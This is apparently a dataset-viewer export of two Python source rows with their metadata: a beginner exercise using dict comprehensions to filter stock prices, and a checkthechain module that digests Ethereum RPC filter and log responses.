#---------------------------------------------------------------------------------------------
# class User:
# def __init__(self, user_id):
# self.user_id = user_id
# def __repr__(self):
# return 'User( {})'.format(self.user_id)
# users = [User(23), User(1), User(99)]
# print(users)
# print(users[0])
#---------------------------------------------------------------------------------------------
# from operator import itemgetter
# from itertools import groupby
# rows = [
# {'address': '5412 N CLARK', 'date': '07/01/2012'},
# {'address': '5148 N CLARK', 'date': '07/04/2012'},
# {'address': '5800 E 58TH', 'date': '07/02/2012'},
# {'address': '2122 N CLARK', 'date': '07/03/2012'},
# {'address': '5645 N RAVENSWOOD', 'date': '07/02/2012'},
# {'address': '1060 W ADDISON', 'date': '07/02/2012'},
# {'address': '4801 N BROADWAY', 'date': '07/01/2012'},
# {'address': '1039 W GRANVILLE', 'date': '07/04/2012'},
# ]
# rows.sort(key=itemgetter('date'))
# for date, items in groupby(rows, key=itemgetter('date')):
# print(date)
# for i in items:
# print(' ', i)
# print(groupby(rows, key=itemgetter('date')))
#---------------------------------------------------------------------------------------------
# Current exercise: dict comprehensions for filtering a mapping.
prices = {
    'ACME': 45.23,
    'AAPL': 612.78,
    'IBM': 205.55,
    'HPQ': 37.20,
    'FB': 10.75
}
# Keep only the entries whose price is above 200.
new_prices = {key: value for key, value in prices.items() if value > 200}
# Keep only the tickers that appear in tech_stock.
tech_stock = {'AAPL', 'FB', 'IBM', 'MSFT'}
new_prices2 = {key: value for key, value in prices.items() if key in tech_stock}
print(new_prices2)
| 24.355603
| 97
| 0.427307
| 1,233
| 11,301
| 3.827251
| 0.150852
| 0.044077
| 0.050434
| 0.026701
| 0.994278
| 0.994278
| 0.994278
| 0.994278
| 0.994278
| 0.994278
| 0
| 0.053921
| 0.209008
| 11,301
| 463
| 98
| 24.408207
| 0.47399
| 0.854526
| 0
| 0.8
| 0
| 0
| 0.052394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
dc1352a0c2e4a18514a3fcd504082382c453ee8d
| 3,786
|
py
|
Python
|
src/ctc/rpc/rpc_digestors/rpc_log_digestors.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/rpc/rpc_digestors/rpc_log_digestors.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/rpc/rpc_digestors/rpc_log_digestors.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from __future__ import annotations
from ctc import spec
from ctc import binary
from .. import rpc_format
from .. import rpc_spec
def digest_eth_new_filter(
    response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
    """Digest the result of an eth_newFilter RPC call.

    When decode_response is set, the raw filter id is converted to an
    integer via binary.convert; otherwise the response passes through
    untouched.
    """
    if not decode_response:
        return response
    return binary.convert(response, 'integer')
def digest_eth_new_block_filter(
    response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
    """Digest the result of an eth_newBlockFilter RPC call.

    When decode_response is set, the raw filter id is converted to an
    integer via binary.convert; otherwise the response passes through
    untouched.
    """
    if not decode_response:
        return response
    return binary.convert(response, 'integer')
def digest_eth_new_pending_transaction_filter(
    response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
    """Digest the result of an eth_newPendingTransactionFilter RPC call.

    When decode_response is set, the raw filter id is converted to an
    integer via binary.convert; otherwise the response passes through
    untouched.
    """
    if not decode_response:
        return response
    return binary.convert(response, 'integer')
def digest_eth_uninstall_filter(
    response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
    """Digest the result of an eth_uninstallFilter RPC call.

    When decode_response is set, the response is converted to an integer
    via binary.convert; otherwise it passes through untouched.
    """
    if not decode_response:
        return response
    return binary.convert(response, 'integer')
def digest_eth_get_filter_changes(
    response: spec.RpcSingularResponse,
    decode_response: bool = True,
    snake_case_response: bool = True,
    include_removed: bool = False,
) -> spec.RpcSingularResponse:
    """Digest the result of an eth_getFilterChanges RPC call.

    Optionally drops entries flagged 'removed', decodes the quantity
    fields named in rpc_spec.rpc_log_quantities, and converts keys to
    snake_case. Every transformation is guarded by a dict check —
    presumably because this call can also return a plain list of hashes
    rather than log objects (TODO confirm against the RPC spec).
    """

    def _is_log_list() -> bool:
        # Re-evaluated before each step: the removal filter may empty the list.
        return len(response) > 0 and isinstance(response[0], dict)

    if not include_removed and _is_log_list():
        response = [entry for entry in response if not entry['removed']]
    if decode_response and _is_log_list():
        response = [
            rpc_format.decode_response(entry, rpc_spec.rpc_log_quantities)
            for entry in response
        ]
    if snake_case_response and _is_log_list():
        response = [rpc_format.keys_to_snake_case(entry) for entry in response]
    return response
def digest_eth_get_filter_logs(
    response: spec.RpcSingularResponse,
    decode_response: bool = True,
    snake_case_response: bool = True,
    include_removed: bool = False,
) -> spec.RpcSingularResponse:
    """Digest the result of an eth_getFilterLogs RPC call.

    Drops entries flagged 'removed' unless include_removed is set, then
    optionally decodes the quantity fields named in
    rpc_spec.rpc_log_quantities and converts keys to snake_case.
    Unlike the filter-changes digestor, the removal filter is applied
    unconditionally: every entry is assumed to be a log dict.
    """
    if not include_removed:
        response = [entry for entry in response if not entry['removed']]

    def _logs_present() -> bool:
        # Checked before each optional step; the filter above may have
        # emptied the list.
        return bool(response) and isinstance(response[0], dict)

    if decode_response and _logs_present():
        response = [
            rpc_format.decode_response(entry, rpc_spec.rpc_log_quantities)
            for entry in response
        ]
    if snake_case_response and _logs_present():
        response = [rpc_format.keys_to_snake_case(entry) for entry in response]
    return response
def digest_eth_get_logs(
    response: spec.RpcSingularResponse,
    decode_response: bool = True,
    snake_case_response: bool = True,
    include_removed: bool = False,
) -> spec.RpcSingularResponse:
    """Digest the result of an eth_getLogs RPC call.

    Drops logs flagged 'removed' unless include_removed is set, then
    optionally decodes the quantity fields named in
    rpc_spec.rpc_log_quantities and converts keys to snake_case.
    """
    if not include_removed:
        response = [log for log in response if not log['removed']]
    # Each optional step re-checks that a non-empty list of dicts remains,
    # since the removal filter may have emptied the response.
    if decode_response and response and isinstance(response[0], dict):
        response = [
            rpc_format.decode_response(log, rpc_spec.rpc_log_quantities)
            for log in response
        ]
    if snake_case_response and response and isinstance(response[0], dict):
        response = [rpc_format.keys_to_snake_case(log) for log in response]
    return response
| 26.851064
| 80
| 0.653988
| 403
| 3,786
| 5.918114
| 0.119107
| 0.09979
| 0.060377
| 0.090566
| 0.935849
| 0.935849
| 0.935849
| 0.92956
| 0.92956
| 0.92956
| 0
| 0.005098
| 0.274696
| 3,786
| 140
| 81
| 27.042857
| 0.863438
| 0
| 0
| 0.807018
| 0
| 0
| 0.012946
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061404
| false
| 0
| 0.04386
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.